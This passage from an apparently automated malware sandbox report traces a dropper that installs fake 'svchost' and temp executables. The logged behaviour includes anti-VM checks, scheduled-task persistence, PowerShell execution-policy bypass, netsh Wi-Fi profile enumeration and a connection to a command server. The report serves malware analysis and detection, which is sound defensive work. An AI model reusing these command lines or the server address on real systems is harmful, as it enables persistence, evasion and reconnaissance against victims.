                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exe TID: 1876Thread sleep time: -597765s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exe TID: 1876Thread sleep time: -597655s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exe TID: 1876Thread sleep time: -597546s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exe TID: 1876Thread sleep time: -200000s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exe TID: 1876Thread sleep time: -99864s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exe TID: 1876Thread sleep time: -99735s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exe TID: 1876Thread sleep time: -99610s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exe TID: 1876Thread sleep time: -99485s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exe TID: 1876Thread sleep time: -99360s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exe TID: 1876Thread sleep time: -99237s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exe TID: 1876Thread sleep time: -99110s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exe TID: 1876Thread sleep time: -98985s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exe TID: 1876Thread sleep time: -98860s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exe TID: 1876Thread sleep time: -98735s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exe TID: 1876Thread sleep time: -98610s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exe TID: 1876Thread sleep time: -98485s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exe TID: 1876Thread sleep time: -98360s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exe TID: 1876Thread sleep time: -98235s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exe TID: 1876Thread sleep time: -595625s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exe TID: 1876Thread sleep time: -595515s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exe TID: 1876Thread sleep time: -595406s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exe TID: 1876Thread sleep time: -595296s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exe TID: 1876Thread sleep time: -595187s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exe TID: 1876Thread sleep time: -595077s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exe TID: 1876Thread sleep time: -594968s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exe TID: 1876Thread sleep time: -594859s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exe TID: 1876Thread sleep time: -594749s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * From Win32_ComputerSystem
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select ProcessorId From Win32_processor
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Users\user\Desktop\zrrHgsDzgS.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exeFile Volume queried: C:\ FullSizeInformation
                    Source: C:\Users\user\Desktop\zrrHgsDzgS.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeThread delayed: delay time: 600000Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeThread delayed: delay time: 599891Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeThread delayed: delay time: 599782Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeThread delayed: delay time: 599657Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeThread delayed: delay time: 599516Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeThread delayed: delay time: 599391Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeThread delayed: delay time: 599266Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeThread delayed: delay time: 599132Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeThread delayed: delay time: 598986Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeThread delayed: delay time: 598797Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeThread delayed: delay time: 598684Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeThread delayed: delay time: 598578Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeThread delayed: delay time: 598469Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeThread delayed: delay time: 598344Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeThread delayed: delay time: 598233Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeThread delayed: delay time: 598112Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeThread delayed: delay time: 597993Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeThread delayed: delay time: 597875Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeThread delayed: delay time: 597766Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeThread delayed: delay time: 597641Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeThread delayed: delay time: 597530Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeThread delayed: delay time: 597410Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeThread delayed: delay time: 597282Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeThread delayed: delay time: 597172Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeThread delayed: delay time: 597063Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeThread delayed: delay time: 596938Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeThread delayed: delay time: 596813Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeThread delayed: delay time: 596688Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeThread delayed: delay time: 596563Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeThread delayed: delay time: 596437Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeThread delayed: delay time: 596328Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeThread delayed: delay time: 596219Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeThread delayed: delay time: 596110Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeThread delayed: delay time: 595985Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeThread delayed: delay time: 595860Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeThread delayed: delay time: 595735Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeThread delayed: delay time: 595610Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeThread delayed: delay time: 595485Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeThread delayed: delay time: 595360Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeThread delayed: delay time: 595235Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeThread delayed: delay time: 595110Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeThread delayed: delay time: 594985Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeThread delayed: delay time: 594860Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeThread delayed: delay time: 594719Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeThread delayed: delay time: 594610Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeThread delayed: delay time: 594485Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeThread delayed: delay time: 594351Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeThread delayed: delay time: 594235Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeThread delayed: delay time: 594110Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeThread delayed: delay time: 593985Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeThread delayed: delay time: 593860Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeThread delayed: delay time: 593735Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exeThread delayed: delay time: 600000
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exeThread delayed: delay time: 599874
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exeThread delayed: delay time: 599765
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exeThread delayed: delay time: 599656
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exeThread delayed: delay time: 599546
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exeThread delayed: delay time: 599437
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exeThread delayed: delay time: 599325
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exeThread delayed: delay time: 599218
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exeThread delayed: delay time: 599109
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exeThread delayed: delay time: 598999
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exeThread delayed: delay time: 598890
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exeThread delayed: delay time: 598780
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exeThread delayed: delay time: 598671
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exeThread delayed: delay time: 598562
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exeThread delayed: delay time: 598453
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exeThread delayed: delay time: 598343
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exeThread delayed: delay time: 598233
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exeThread delayed: delay time: 598114
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exeThread delayed: delay time: 597984
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exeThread delayed: delay time: 597874
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exeThread delayed: delay time: 597765
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exeThread delayed: delay time: 597655
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exeThread delayed: delay time: 597546
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exeThread delayed: delay time: 100000
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exeThread delayed: delay time: 99864
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exeThread delayed: delay time: 99735
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exeThread delayed: delay time: 99610
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exeThread delayed: delay time: 99485
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exeThread delayed: delay time: 99360
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exeThread delayed: delay time: 99237
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exeThread delayed: delay time: 99110
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exeThread delayed: delay time: 98985
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exeThread delayed: delay time: 98860
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exeThread delayed: delay time: 98735
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exeThread delayed: delay time: 98610
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exeThread delayed: delay time: 98485
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exeThread delayed: delay time: 98360
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exeThread delayed: delay time: 98235
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exeThread delayed: delay time: 595625
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exeThread delayed: delay time: 595515
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exeThread delayed: delay time: 595406
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exeThread delayed: delay time: 595296
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exeThread delayed: delay time: 595187
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exeThread delayed: delay time: 595077
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exeThread delayed: delay time: 594968
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exeThread delayed: delay time: 594859
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exeThread delayed: delay time: 594749
                    Source: svchost.exe.0.drBinary or memory string: vmware
                    Source: svchost.exe, 00000007.00000002.2933868519.0000000006C50000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                    Source: zrrHgsDzgS.exe, 00000000.00000002.1725153654.0000000000C58000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
                    Source: svchost.exe, 00000007.00000002.2930700554.0000000005BAE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}t
                    Source: luglzv.exe.7.drBinary or memory string: VMwareVBox
                    Source: udwnme.exe, 0000000F.00000002.2932225102.0000000005420000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllpping 8, GenuineIntelPROCESSOR_LEVEL=6PROCESSOR_REVISION=8f08ProgramData=C:\ProgramDataProgramFiles=C:\Program Files (x86)ProgramFiles(x86)=C:\Program Files (x86)ProgramW6432=C:\Program FilesPROMPT=$P$GPSExecutionPolicyP
                    Source: svchost.exe, 00000007.00000002.2930537569.0000000005B8E000.00000004.00000020.00020000.00000000.sdmp, luglzv.exe, 0000001C.00000002.2933769368.0000000004FC0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                    Source: C:\Users\user\Desktop\zrrHgsDzgS.exeProcess information queried: ProcessInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeCode function: 15_2_05400B20 LdrInitializeThunk,15_2_05400B20
                    Source: C:\Users\user\Desktop\zrrHgsDzgS.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exeProcess token adjusted: Debug
                    Source: C:\Users\user\Desktop\zrrHgsDzgS.exeMemory allocated: page read and write | page guardJump to behavior

                    HIPS / PFW / Operating System Protection Evasion

                    barindex
                    System process connects to network (likely due to code injection or exploit)
                    Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 94.232.249.111 7707Jump to behavior
                    Bypasses PowerShell execution policy
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Local\Temp\udwnme.exe"'
                    Source: C:\Users\user\Desktop\zrrHgsDzgS.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\user\AppData\Roaming\svchost.exe"' & exitJump to behavior
                    Source: C:\Users\user\Desktop\zrrHgsDzgS.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmpF775.tmp.bat""Jump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\user\AppData\Roaming\svchost.exe"' Jump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 3Jump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Roaming\svchost.exe "C:\Users\user\AppData\Roaming\svchost.exe" Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c start /b powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Local\Temp\udwnme.exe"' & exitJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c start /b powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Local\Temp\luglzv.exe"' & exitJump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Local\Temp\udwnme.exe"' Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\udwnme.exe "C:\Users\user\AppData\Local\Temp\udwnme.exe" Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr AllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssidJump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\chcp.com chcp 65001
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profile
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr All
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\chcp.com chcp 65001
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh wlan show networks mode=bssid
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Local\Temp\luglzv.exe"'
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\luglzv.exe "C:\Users\user\AppData\Local\Temp\luglzv.exe"
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\chcp.com chcp 65001
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profile
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr All
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\chcp.com chcp 65001
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh wlan show networks mode=bssid
                    Source: svchost.exe, 00000007.00000002.2919350933.0000000003464000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager@\fq%
                    Source: svchost.exe, 00000007.00000002.2919350933.0000000003464000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager
                    Source: svchost.exe, 00000007.00000002.2919350933.0000000003464000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerTefq@IF
                    Source: svchost.exe, 00000007.00000002.2919350933.0000000003464000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerTefq KF
                    Source: svchost.exe, 00000007.00000002.2919350933.0000000003464000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager@\fq

                    Language, Device and Operating System Detection

                    barindex
                    Yara detected Telegram Recon
                    Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\udwnme.exe, type: DROPPED
                    Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\luglzv.exe, type: DROPPED
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion DigitalProductIdJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion DigitalProductId
                    Source: C:\Users\user\Desktop\zrrHgsDzgS.exeQueries volume information: C:\Users\user\Desktop\zrrHgsDzgS.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\zrrHgsDzgS.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeQueries volume information: C:\Users\user\AppData\Roaming\svchost.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeQueries volume information: C:\Users\user\AppData\Roaming\svchost.exe VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
